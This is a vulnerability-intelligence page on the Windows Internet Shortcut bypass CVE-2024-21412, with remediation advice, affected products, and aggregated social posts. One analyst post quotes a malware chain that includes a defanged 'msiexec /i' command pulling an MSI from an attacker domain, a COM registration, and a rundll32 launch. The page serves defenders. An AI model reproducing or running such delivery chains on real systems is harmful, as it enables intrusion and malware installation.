CVE-2024-21412General(microsoft / windows_10_1809)

CRITICALCVSS 8.1 · HIGHCISA KEV

Exploitation ongoing with high activity in latest observed window (1 mentions)

Immediate actions

  • Patch microsoft windows_10_1809 systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: Immediate (within 24h)

NVD description

Internet Shortcut Files Security Feature Bypass Vulnerability

8.3/ 10 priority

Sources & remediation

Listed in the CISA Known Exploited Vulnerabilities catalog. Federal remediation due date: 2024-03-05. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Weakness type (CWE)
CWE-693

Priority

CRITICAL

Exploitation

ACTIVE

PoC

YES

Patch

AVAILABLE

Momentum

STABLE

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • windows_10_1809
  • windows_10_21h2
  • windows_10_22h2
  • windows_11_21h2

Threat summary

  • Active exploitation appears in 4 classified signals
  • Public PoC and exploit tooling are both present
  • Patch or workaround signal is available
  • 10 mentions across 9 observed days

What's happening

  • Active exploitation reported across 4 signals
  • Exploit tool or code specified in 1 signal
  • PoC mentioned or linked in 2 signals
  • Patch or workaround mentioned in 3 signals
  • Technical details provided in 3 signals
  • General: 3 classified signals
  • Peaked 3d ago at 2 mentions (2026-05-03); latest day: 1
  • 10 total mentions across 9 days

Affected systems

Vendors
Products
windows_10_1809windows_10_21h2windows_10_22h2windows_11_21h2windows_11_22h2windows_11_23h2windows_server_2019windows_server_2022windows_server_2022_23h2

Deep dive

Activity timeline10 mentions / 9d
01122Mentions · 2026-02-03: 1Mentions · 2026-02-04: 1Mentions · 2026-03-20: 1Mentions · 2026-04-01: 1Mentions · 2026-04-15: 1Mentions · 2026-05-03: 2Mentions · 2026-09-23: 1Mentions · 2026-09-30: 1Mentions · 2026-10-07: 1PoC Mentioned / Linked · 2026-02-03: 1PoC Mentioned / Linked · 2026-05-03: 1Exploit Tool / Code · 2026-05-03: 1Active Exploitation · 2026-02-03: 1Active Exploitation · 2026-05-03: 2Active Exploitation · 2026-09-23: 1Patch / Workaround · 2026-02-03: 1Patch / Workaround · 2026-04-01: 1Patch / Workaround · 2026-05-03: 1Technical Details · 2026-02-03: 1Technical Details · 2026-04-01: 1Technical Details · 2026-05-03: 102-0302-0403-2004-0104-1505-0309-2309-3010-07
Signal classification3 categories
General
337.5%
Active Exploitation
337.5%
Patch
225.0%
Referenced assets6 URLs
Classification over time
DateTotalLabels
2026-02-031
Patch1
2026-02-041
General1
2026-03-201
General1
2026-04-011
Patch1
2026-04-151
General1
2026-05-032
Active Exploitation2
2026-09-231
Active Exploitation1
Full discourse10 posts
  • DFIR Radar@DFIR_Radar
    Active Exploitation

    Water Hydra's DarkMe RAT drops zero-day delivery for plain .pif phishing, reaching beyond forex traders into corporate environments. The loader chain is unchanged; only the entry point got cheaper. - Water Hydra (EvilNum/DarkCasino) swapped CVE-2023-38831 and CVE-2024-21412 for a malspam link pointing to image.pif (SHA256: 394c93df...), a PE32+ binary Windows executes on double-click. The .pif extension is a DOS-era relic with no legitimate modern use, making any execution event an immediate hunt priority. The file was masqueraded as a PNG and delivered from readonline365[.]com and four other hosts, all scoring 0 malicious on VirusTotal at discovery. - The chain: PIF spawns msiexec /i hxxps://onlineview365[.]com/propi.msi /quiet, which drops components to %AppData%\ComponentsFolder\ via EXPAND.EXE, runs prnfig.wsf to write a COM registration (CLSID {CFDC57BA-1705-45AF-BA10-EFC3D592982B}) via reg.exe import, then fires rundll32.exe /sta {CLSID}, an opaque invocation with no DLL path on the command line, through three VB6 loader DLLs: Coconout.dll, Use.dll (FillText), and Finalized.dll (Calculation). - Use.dll gates on a 329-app process list containing wallets, trading terminals, game launchers, and RGB utilities but zero analysis tools. This is an inverted sandbox check: no Steam or Slack means no real user, and execution stops cleanly. #DFIR_Radar

    Post summary

    Water Hydra is actively exploiting a .pif phishing vector to deliver DarkMe RAT into corporate environments, using a multi-stage loader chain with sandbox evasion (gating on 329 process names). Full technical indicators (SHA256, domains, CLSIDs, DLLs) are provided with no patch or PoC reference.

    10101257
    2.0K followersView on X
  • Ostorlab@OstorlabSec
    Patch

    🚨 CVE-2024-21412 : WINDOWS MOTW BYPASS MALWARE DELIVERY ALERT 🚨 @Microsoft A critical Windows security feature bypass vulnerability has been disclosed in the handling of Internet Shortcut (.URL) files, allowing attackers to bypass Mark-of-the-Web protections and deliver malware with no security warnings. Exploitation requires only a single user click and is actively used in ransomware campaigns. Risk Severity: - High (CVSS 8.1, active exploitation, public proof-of-concept available, ransomware activity observed) Impact: - Silent malware execution via trusted .URL files - Bypass of Mark-of-the-Web security warnings - Initial access for ransomware and espionage operations - Credential harvesting via stealthy redirection - SmartScreen and Defender ASR evasion - Lateral movement through shared network locations Root Cause: - CWE-693 (Protection Mechanism Failure). Windows fails to correctly propagate Mark-of-the-Web zone identifiers when parsing Internet Shortcut files. Crafted URL handlers bypass security zone inheritance, allowing execution without user consent prompts. Attackers can: - Deliver weaponized .URL files via email, SharePoint, or network shares - Trigger silent redirection or payload execution on user interaction - Execute commands via rundll32.exe or ieframe.dll without warnings - Bypass user awareness and multiple endpoint security controls - Stage follow-on ransomware or credential theft attacks Are You Affected? - Vulnerable: Windows 10, Windows 11, and Windows Server 2016–2022 (multiple builds) - Scope: Enterprise endpoints handling email attachments, collaboration platforms, and shared drives Immediate Action Required: - Update: Apply February 2024 Microsoft security updates immediately (KB5034763 / KB5034765 / KB5034768 / KB5034769 or later) - Mitigation: Block `.URL` attachments at email gateways, disable URL shortcut execution via Group Policy, and treat shortcuts as high-risk files in Outlook - Audit: Hunt for `.url`-triggered executions from explorer.exe, monitor rundll32.exe network activity, and review recent shortcut access on endpoints Trusted file types are now active phishing weapons. Patch fast and block aggressively. 🛡️ #ostorlabCVE

    Post summary

    CVE‑2024‑21412 is a critical Mark‑of‑the‑Web bypass vulnerability actively exploited for malware delivery, with a public PoC and high severity; Microsoft has issued patches and mitigation guidance.

    0101089
    582 followersView on X
  • Lyrie.ai@lyrie_ai
    Active Exploitation

    CVE-2024-21412: Microsoft Windows Internet Shortcut Files contains an unspecified vulnerability that allows for a security feature bypass. Status: ✅ Confirmed exploited in the wild Date added: 2024-02-13 Required action: Apply mitigations per vendor instructions or…

    Post summary

    CVE-2024-21412 has been confirmed as being actively exploited in the wild, and vendors have issued mitigations that users should apply.

    1000039
    152 followersView on X
  • ⌡æc◙↓♣ T. ( Jacob T)@Agen_t_T
    General

    @gothburz @gothburz Dear Peter Girnus. Your work in regards too CVE-2024-21412, https://www.trendmicro.com/en_gb/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html Impressive. My work in regards too Flax Typhoon - https://x.com/i/grok?conversation=2019111545377071614 Also impressive , just scaled worldwide instead. - Work with me , les talk. https://www.justice.gov/archives/opa/pr/court-authorized-operation-disrupts-worldwide-botnet-used-peoples-republic-china-state

    Post summary

    The tweet references CVE-2024-21412 and praises work on it but contains no technical, exploit, or patch information.

    00010131
    199 followersView on X
  • Bhavesh Verma@xbhaveshverma

    CVEs Explainer #6 CVE-2024-21412 (Windows SmartScreen Bypass) A security feature bypass in Microsoft Defender SmartScreen. Attackers could trick users into opening malicious Internet Shortcut files, bypassing the warning dialog and executing arbitrary code. It was actively exploited by the DarkGate malware to deliver info-stealers, proving that even built-in OS protections can be defeated.

    0000078
    149 followersView on X
  • ro0TCr4k@ro0TCr4k

    Microsoft's CVE-2024-21412 is a masterclass in evasion: bypassing SmartScreen with zero clicks. This isn't a theoretical risk; it's weaponized in the wild. Patching is your only real perimeter now.

    0000055
    508 followersView on X
  • Lyrie.ai@lyrie_ai
    Active Exploitation

    https://lyrie.ai/research/research/active-exploit-cve-2024-21412-windows #lyrie #cybersecurity #CVE #threatintel #zerodayattack

    Post summary

    CVE‑2024‑21412 is reported to be actively exploited in the wild, with a PoC and likely exploit code shared, but no patch or mitigation has been disclosed.

    0000024
    152 followersView on X
  • Wiseman Infosec@officialwisema
    General

    🚨 Defender Zero-Day Alert! CVE-2024-21412 bypasses SmartScreen to execute malware. Protect your perimeter with Wiseman Infosec’s EDR tuning & threat hunting. 📧 sales@wisemaninfosec.com 🌐 http://wisemaninfosec.com #CyberSecurity #Infosec #ZeroDay #WisemanInfosec #StaySecure https://t.co/BlsxEXoH0S

    Post summary

    The tweet announces CVE‑2024‑21412 as a zero‑day that bypasses SmartScreen, but does not provide PoC links, exploit code, active exploitation evidence, or technical details, and therefore falls under a general alert category.

    00000110
    3 followersView on X
  • @Anti_Ch_PC@Anti_Ch_PCgc
    Patch

    https://nvd.nist.gov/vuln/detail/CVE-2024-21412 Windowsのショートカットファイルを悪用したセキュリティ脆弱性(CVE-2024-21412)に関するレポートです。悪用されるとセキュリティ機能がバイパスされる恐れがあるため、速やかなパッチ適用が必要です。

    Post summary

    The post reports on CVE‑2024‑21412, noting that Windows shortcut files can be abused to bypass security features and urging users to apply the necessary patch promptly.

    0000077
  • Patrick Roland@DeusLogica
    General

    🎯 DIB Threat Briefing — March 20, 2026 1560 CVEs tracked • 25 threat actors • 14 sectors **Top DIB Targets:** • APT28 (Russia) — Defense Industrial Base + Aerospace (CVE-2024-23897, CVE-2024-1709) • APT29 (Russia) — Energy + Govt overlap (CVE-2024-3400, CVE-2024-21762) • APT40 (China) — Maritime + Tech (CVE-2024-21412, CVE-2024-21762) • Qilin — DIB + Healthcare (CVE-2024-21762, CVE-2024-3400, CVE-2024-1709) 10+ APT groups actively targeting DIB sectors. Pipeline running: dark web scan → CVE mapping → sector targeting → alerting. Data source: Roland Fleet CTI (MISP + custom graph + dark web observatory)

    Post summary

    The briefing catalogs CVEs associated with specific threat actors targeting DIB sectors, but offers no technical, exploit or mitigation details.

    0000068
    329 followersView on X
CPE platform detail9 entries

9 of 9 entries

PartVendorProductVersionTarget SWTarget HW
OSmicrosoftwindows_10_1809---
OSmicrosoftwindows_10_21h2---
OSmicrosoftwindows_10_22h2---
OSmicrosoftwindows_11_21h2---
OSmicrosoftwindows_11_22h2---
OSmicrosoftwindows_11_23h2---
OSmicrosoftwindows_server_2019---
OSmicrosoftwindows_server_2022---
OSmicrosoftwindows_server_2022_23h2---

Explore more